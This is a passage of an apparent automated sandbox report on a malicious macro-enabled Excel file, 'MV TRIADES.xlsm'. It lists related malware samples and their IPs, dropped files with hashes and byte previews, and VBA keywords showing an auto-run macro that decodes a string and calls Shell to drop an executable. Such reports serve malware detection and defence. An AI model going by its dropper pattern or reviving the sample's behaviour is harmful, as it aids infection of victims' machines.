                                                mj8ejPVt3a.exeGet hashmaliciousBrowse
                                                • 172.67.176.78
                                                AS-26496-GO-DADDY-COM-LLCUSSWIFT COPY_PDF.exeGet hashmaliciousBrowse
                                                • 107.180.4.11
                                                shippingdoc_pdf.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                Po # 6-10331.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                KI985JJ3dtaZtda.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                NEW ORDER_PDF.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                ZchEM36552.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                Purcahse_Order_3222021.exeGet hashmaliciousBrowse
                                                • 107.180.26.185
                                                swift_Telex.exeGet hashmaliciousBrowse
                                                • 107.180.26.185
                                                yLmDpCx1xp.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                dnW1mfW27L.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                NXpoHPqfh0.exeGet hashmaliciousBrowse
                                                • 107.180.2.30
                                                Rz9fvf4OTb.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                K0or0EZubp.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                Doc.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                TQPHHyjqoJdMHyp.exeGet hashmaliciousBrowse
                                                • 107.180.54.183
                                                z2xQEFs54b.exeGet hashmaliciousBrowse
                                                • 184.168.131.241
                                                FEB SOA.exeGet hashmaliciousBrowse
                                                • 148.66.138.106
                                                MJUsJ8rw4V.dllGet hashmaliciousBrowse
                                                • 107.180.90.10
                                                1W2Ih2UesO.exeGet hashmaliciousBrowse
                                                • 107.180.104.65
                                                NAMECHEAP-NETUSincome.exeGet hashmaliciousBrowse
                                                • 198.54.116.63
                                                IMG_50_70_66301.docGet hashmaliciousBrowse
                                                • 162.213.253.52
                                                ORDER.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Purchase Order-877.exeGet hashmaliciousBrowse
                                                • 199.188.200.10
                                                SecuriteInfo.com.Trojan.MulDrop16.33902.6810.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                SecuriteInfo.com.Trojan.MulDrop16.33902.452.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                SecuriteInfo.com.Trojan.PackedNET.594.3012.exeGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                PO_4500515522_20210317_060435_10010533.xlsxGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                MACHINE SPECIFICATION.exeGet hashmaliciousBrowse
                                                • 198.54.117.215
                                                2vWeR8OLTD.exeGet hashmaliciousBrowse
                                                • 198.54.116.63
                                                INQUIRY for IB Series 20-24 cavities .docGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                Inquiry from SYRABIA LIMITED.docGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                Purchase Order P.O-213-032021.docGet hashmaliciousBrowse
                                                • 198.54.122.60
                                                qzinl7qkwD.exeGet hashmaliciousBrowse
                                                • 198.54.117.199
                                                qzinl7qkwD.exeGet hashmaliciousBrowse
                                                • 198.54.117.199
                                                SecuriteInfo.com.Trojan.PackedNET.591.17594.exeGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Purchase Order19321.docGet hashmaliciousBrowse
                                                • 162.0.235.23
                                                PO_4500515522_20210317_060435_10010533.xlsxGet hashmaliciousBrowse
                                                • 199.193.7.228
                                                Purchase Order19320.docGet hashmaliciousBrowse
                                                • 162.0.235.23
                                                RFQ00787676545654300RITEC.docGet hashmaliciousBrowse
                                                • 198.54.117.217

                                                JA3 Fingerprints

                                                No context

                                                Dropped Files

                                                No context

                                                Created / dropped Files

                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58596
                                                Entropy (8bit):7.995478615012125
                                                Encrypted:true
                                                SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                MD5:61A03D15CF62612F50B74867090DBE79
                                                SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                Malicious:false
                                                Reputation:high, very likely benign file
                                                Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):326
                                                Entropy (8bit):3.1292511123011737
                                                Encrypted:false
                                                SSDEEP:6:kKchkwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:SkwTJrkPlE99SNxAhUe0ht
                                                MD5:4955CCE9CFBC6D1A47439BF94F0156BB
                                                SHA1:C4B6AA6E04492A480C64B69B160D07EC1F129223
                                                SHA-256:B7DD856AD1BA10864E22A032FE8933ADF976944F39EF59B0083A9DB138276D46
                                                SHA-512:FF12AE467AB5CF3771F674246E03CA1ED9F7715923411A081883426314F57004241C0E689728BA56361446AD206DEC40E7803CAABBC3AB467120871182CDC074
                                                Malicious:false
                                                Reputation:low
                                                Preview: p...... .........A..k...(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                C:\Users\user\AppData\Local\ConsoleApp1\tNDFx.exe_Url_1w40bkugt4lbn414pfn202m3aujsqqra\7.926.901.773\qf3mddhz.newcfg
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                                Category:modified
                                                Size (bytes):986519
                                                Entropy (8bit):3.1100391617947
                                                Encrypted:false
                                                SSDEEP:12288:Kd6neAu0wje1N9hy3n/h7bE8Ht1C0q9MmwDbPZBOI8JPJHLPwOFdWrTYC36Kiglh:Ewm2/C3yIm85KS
                                                MD5:7837C874BCAD1A0F326C0780C17C9635
                                                SHA1:FE07D87459BC80E10204131F0CDC58C8AEF20F26
                                                SHA-256:2C6CF4BB5FF992E99CA0C27E00DE168117425EE41C15D40E05BDF082387C7916
                                                SHA-512:0D6043A2E5EBC81D1D6B20DD5866077FB656843426090FEB81323072129803B0D7B5CB5090FF94FD430DD8E9989C4FB517D51400DA7CC4876EC07456086456CB
                                                Malicious:false
                                                Reputation:low
                                                Preview: <?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <sectionGroup name="userSettings" type="System.Configuration.UserSettingsGroup, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" >.. <section name="XJsMDredQitBteUFpCkVIptAzENRZSlAHGRebGOZFvUFSXIjN.DHzRxafGuhgYQncSIkaSNopzGCsXZsijENdUfVsMQ" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" allowExeDefinition="MachineToLocalUser" requirePermission="false" />.. </sectionGroup>.. </configSections>.. <userSettings>.. <XJsMDredQitBteUFpCkVIptAzENRZSlAHGRebGOZFvUFSXIjN.DHzRxafGuhgYQncSIkaSNopzGCsXZsijENdUfVsMQ>.. <setting name="LfKbKERaNoRoandKkMhQHNrlxYKrbTSoxaOjdkupFfqypo".. serializeAs="String">.. <value>77 90 144 0 3 0 0 0 4 0 0 0 255 255 0 0 184 0 0 0 0 0 0 0 64 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\625B6235.jpg
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 1243 x 610, 8-bit/color RGBA, non-interlaced
                                                Category:dropped
                                                Size (bytes):405384
                                                Entropy (8bit):7.987375037036153
                                                Encrypted:false
                                                SSDEEP:12288:349w8fyunGthwu8kxPthZugvq4jzjSGUuV:349b7AhFxPthZnvL3tV
                                                MD5:5C38192171779B0CC053C4CD48D80DB6
                                                SHA1:5EC3E8D686AE4BC54AFBFF7E32B39F4C3C8AEED8
                                                SHA-256:BF72C8EF884B5851EA5B7D6C9336188A442D4AAA9C006CD417C241BCAF98EA0C
                                                SHA-512:68EBE5C97C9E21FC304F0954DCA0BA03A0B10099E0390FCE80686646F0C2CD63319F692650607807C1299DF20DFBA99F7AAF99546B4399EC2026FF9DAD951032
                                                Malicious:false
                                                Preview: .PNG........IHDR.......b........V....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...c]..=......y......^..6I%.;m.@=.I....)R\/~q..]...wh.R....5..9..).......g...g.Y{f...v.@t.P..)..(*@:.R...}.^....E?.PY_.rmy.d.1.l..;...{O...z.....T..{.a!.Y~...;.r.Af..d....k_9.....*.....p....J_..P...J.&T...2...d.w..C....ei_....Y.[..?.........f>2....D.m..|..{...+B..4.Z..'...=.....k...v..l.-...H..G.3-O...mZ...i.....y..:.f.>TL}h.u.Ny....T.Y.G.,"^..P..Z.{....Kxz#Po._.....v..Z/..$...../C.Gr,..,v.....6.......9]c.....Lz....n.hk.o!...E......<.............F...6.>c;.Y...w..........5.........m..M..M'..F....m.;a.X.A..?...U.o....|....>.c...gkW.N.}F..6.5ie..Z6...%...?..c.|.>.j........OA.UP....d.Vj.4Aee..........?.X[.7a.O..=.0q.9N_.}../6...kc..9...k...r.*&d....9.6..D.,.h.z...9.p..-...E.L..V.DX.r.B.a&...@(.....#B.[....!*..yH#.+.X.".3OaH..Y.[....g.0....ci.t`...r.9Z{..!..J.........".:..l...".x...3.>.....X7....E..!.c...G.r.^#4..m..g....a....&.s.....A$p..
                                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FEF21AB2.png
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:PNG image data, 225 x 225, 8-bit colormap, non-interlaced
                                                Category:dropped
                                                Size (bytes):959
                                                Entropy (8bit):7.35380703026024
                                                Encrypted:false
                                                SSDEEP:24:KmW3yzBdr1zIOJWauDsUlCGa8QvoXD0jhUp9+11:4Gbr1Dsozb8QwWMc11
                                                MD5:56B608676A1D434E9057266A871DFAA8
                                                SHA1:587F06D07126A801104B9C1935017A2EDD0EA720
                                                SHA-256:579803A34DCCBD974C0F2AF5250550524CD5242D5449A6E6C079E8F4F7FAF103
                                                SHA-512:07F13C6AABA874C0BE4C61FD4D0F596DADF08169F4369937B3D61684E442E7BC5930651A5CF92DCBFE54BCFF48BAB781E922EC6EF9A64B37E63BCF5B4E8AA1E9
                                                Malicious:false
                                                Preview: .PNG........IHDR..............m"H...-PLTE......aaa............................???KKK.......MIDATx....0....g.....]..c.:Ha.....0.\.2.....1.u...8.i....\'..>......^...8./....|...8..u....6.....Yp..g..X.XR...........GYq.o....e[0~...X=..+&Bo......^q#....*nfb.b..{..+.X0.OBo.....O(.Zqg&4...+..8..Z0..2.Z1...L.V..PO,.c.S.FX.p.-.........3......[.......OfB.1..3........V,...k....xJ...'..X0../.(.z...W[P.b.Lh.G.B&4..QyA.....z.X%..~....b...fB.'..Co......Wl..M.h4..m4./(.\..B......*..B.Pl.b.LhZD.i.-...uA...]2....N.......z+.XP..b..[.c.-5..=......zK..;[P(...LhJF.M&4..rA..N....(....w.z...;..l4..r.......6...h8.&7.A...V........[...y.-G.."..c...z...\P.b.Lh.F#T&4...vAa.......,..g...z.v..fB......<N.....V...M:..3.IEc.....P.......?@.-..?L&4_..$.....tA..eB#.x.}De^/o.?r..l|..G..o._...46|..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1..C.1.......T.n[..]....IEND.B`.
                                                C:\Users\user\AppData\Local\Temp\Cab9934.tmp
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                Category:dropped
                                                Size (bytes):58596
                                                Entropy (8bit):7.995478615012125
                                                Encrypted:true
                                                SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                MD5:61A03D15CF62612F50B74867090DBE79
                                                SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                Malicious:false
                                                Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                C:\Users\user\AppData\Local\Temp\Tar9935.tmp
                                                Process:C:\Users\user\AppData\Roaming\tNDFx.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):152788
                                                Entropy (8bit):6.309740459389463
                                                Encrypted:false
                                                SSDEEP:1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
                                                MD5:4E0487E929ADBBA279FD752E7FB9A5C4
                                                SHA1:2497E03F42D2CBB4F4989E87E541B5BB27643536
                                                SHA-256:AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
                                                SHA-512:787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
                                                Malicious:false
                                                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........|h....210303062855Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SFY2ZDAX72H3NDC9G39.temp
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):8016
                                                Entropy (8bit):3.59046692240568
                                                Encrypted:false
                                                SSDEEP:96:chQCsMqZqvsqvJCwo1z8hQCsMqZqvsEHyqvJCworbzv1YyHmQhOZlUV/Iu:cywo1z8yMHnorbzvYQhOSIu
                                                MD5:3B3B1714DCD8B8988FC2C80DC784C02F
                                                SHA1:05D3A860E5319CBF9FBDE9010E9DDBF48AC6DBAE
                                                SHA-256:716F2D54E088BCE4FBD19DEB092DFA2E2CCFF11B0A565AAEDB0A443F612259D5
                                                SHA-512:C5E90F7603BB6BDFA7D5898D9C7093C93E88F5ED4BBAF9888B36DCE72C8FC21EBEF3C9978F91E74890AEDA4A185AE7FF78EB4C710709DA10617B9CF647703684
                                                Malicious:false
                                                Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                C:\Users\user\AppData\Roaming\tNDFx.exe
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                Category:dropped
                                                Size (bytes):69736
                                                Entropy (8bit):5.5447144009894265
                                                Encrypted:false
                                                SSDEEP:768:Ui0upenX9w1hHAWyGiqIoZphnxfsmnOYOSLCGflvsGflvx/FIwJGun51oGflvx/+:U1upa21hFyGiqI0jxfsRw0
                                                MD5:B2AB5D8639C89D42ACBDC362B86ACA91
                                                SHA1:84A55E89E1B5731A0DC1E8475E148B7C3EBB8B01
                                                SHA-256:7A8E27F4732DE792D7904A347061EFD90E892A954206ADB676FE8B8A914CA3FA
                                                SHA-512:F7B0C0221812EF3CDEE347125236EB7B430305BC904ABA40CE49EFC921664DD776D4B371649045ED31C062E7FC41391740B217FC3FC2C9F55B41168C6F94B630
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 28%
                                                Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....N............"...0.............N.... ... ....@.. .......................`............@.....................................K.... ..................h....@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H........s..\............................................................*".(.....*R.(.......s....}....*6.(~...o%....*>..r.L.p.o0....*".(1....*Vs....(2...t.........*~r...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pz*.r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pz*....0..........r...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr...pzr.
                                                C:\Users\user\Desktop\~$MV TRIADES.xlsm
                                                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):165
                                                Entropy (8bit):1.4377382811115937
                                                Encrypted:false
                                                SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                MD5:797869BB881CFBCDAC2064F92B26E46F
                                                SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                Malicious:true
                                                Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                Static File Info

                                                General

                                                File type:Microsoft Excel 2007+
                                                Entropy (8bit):7.980392459837041
                                                TrID:
                                                • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
                                                • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
                                                • ZIP compressed archive (8000/1) 7.58%
                                                File name:MV TRIADES.xlsm
                                                File size:430221
                                                MD5:f7f66672f19f2dabe4f7269e32eb8540
                                                SHA1:688ba6fb074142755fecd74056278b145a282f5a
                                                SHA256:9664740123170b912430759af6cfad9ff784ccd266fe93909022093beff051c7
                                                SHA512:b6a3f0df23c731b57ec21ed74bba187a46f49fb35c35a089417b17cc2dc1fed3b4dba04584b1ccb26df7fb7e29459a268c25d4d0df918b9eb0a319303aff360e
                                                SSDEEP:12288:Y49w8fyunGthwu8kxPthZugvq4jzjSGUuiG:Y49b7AhFxPthZnvL3t/
                                                File Content Preview:PK..........!...'.............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                File Icon

                                                Icon Hash:e4e2aa8aa4bcbcac

                                                Static OLE Info

                                                General

                                                Document Type:OpenXML
                                                Number of OLE Files:1

                                                OLE File "/opt/package/joesandbox/database/analysis/372951/sample/MV TRIADES.xlsm"

                                                Indicators

                                                Has Summary Info:False
                                                Application Name:unknown
                                                Encrypted Document:False
                                                Contains Word Document Stream:
                                                Contains Workbook/Book Stream:
                                                Contains PowerPoint Document Stream:
                                                Contains Visio Document Stream:
                                                Contains ObjectPool Stream:
                                                Flash Objects Count:
                                                Contains VBA Macros:True

                                                Summary

                                                Author:BOOLOO
                                                Last Saved By:BOOLOO
                                                Create Time:2021-03-17T12:53:17Z
                                                Last Saved Time:2021-03-21T07:13:49Z
                                                Creating Application:Microsoft Excel
                                                Security:0

                                                Document Summary

                                                Thumbnail Scaling Desired:false
                                                Company:
                                                Contains Dirty Links:false
                                                Shared Document:false
                                                Changed Hyperlinks:false
                                                Application Version:16.0300

                                                Streams with VBA

                                                VBA File Name: Sheet1.cls, Stream Size: 1180
                                                General
                                                Stream Path:VBA/Sheet1
                                                VBA File Name:Sheet1.cls
                                                Stream Size:1180
                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . J . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . ! c L i 1 F . . . . . N . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . ! j 6 . W ` w E . . . B . l . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . ! j 6 . W ` w E . . . B . l . . . . ! c L i 1 F . . . . . N . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 03 00 06 00 01 00 00 5a 03 00 00 e4 00 00 00 10 02 00 00 88 03 00 00 96 03 00 00 ea 03 00 00 00 00 00 00 01 00 00 00 4a 17 93 bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 cf 1d 21 63 4c 69 31 46 bb d7 ba e1 e7 4e 15 97 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                False
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                VB_TemplateDerived
                                                VBA Code
                                                VBA File Name: ThisWorkbook.cls, Stream Size: 33779
                                                General
                                                Stream Path:VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:33779
                                                Data ASCII:. . . . . . . . . B . . . . . . . 8 . . . . . . . . . . . ! p . . . . . . . . . . J . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . @ . _ . . K G . 1 . 7 . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . G 5 ' . . r E . . ' . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . G 5 ' . . r E . . ' . . [ . . . @ . _ . . K G . 1 . 7 . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 03 00 06 00 01 00 00 42 08 00 00 e4 00 00 00 38 02 00 00 a7 08 00 00 b5 08 00 00 21 70 00 00 00 00 00 00 01 00 00 00 4a 17 e6 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 e9 40 be 5f 1b 17 4b 47 a6 31 e1 37 8b 19 f0 cd 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                PzJjQLNaCwSTDGq)
                                                String,
                                                Val("&H"
                                                sssssss(CodeKey
                                                DataIn
                                                VB_Name
                                                VB_Creatable
                                                "ThisWorkbook"
                                                VB_Exposed
                                                strDataOut
                                                sssssss
                                                PzJjQLNaCwSTDGq
                                                Public
                                                Function
                                                String
                                                String)
                                                Len(CodeKey))
                                                lonDataPtr)
                                                sssssss("a",
                                                VB_Customizable
                                                Integer
                                                (Len(DataIn)
                                                retval
                                                ((lonDataPtr
                                                VB_TemplateDerived
                                                Asc(Mid$(CodeKey,
                                                (Mid$(DataIn,
                                                False
                                                lonDataPtr
                                                Attribute
                                                Workbook_Open()
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                Shell(sssssss)
                                                VB_Base
                                                VBA Code

                                                Streams

                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 416
                                                General
                                                Stream Path:PROJECT
                                                File Type:ASCII text, with CRLF line terminators
                                                Stream Size:416
                                                Entropy:5.27264099156
                                                Base64 Encoded:True
                                                Data ASCII:I D = " { D 1 A 6 0 3 4 6 - B 1 2 9 - 4 A D 6 - B F 9 2 - 8 4 E F A 9 C 3 9 B 0 2 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 7 C 7 E 9 5 D 9 E D 9 3 F 1 9 3 F 1 9 3 F 1 9 3 F 1 " . . D P B = " 3 A 3 8 D 3 9 F 9 0 A 0 9 0 A 0 9 0 " . . G C = " F 8 F A 1 1 E 2 1 2 E 2 1 2
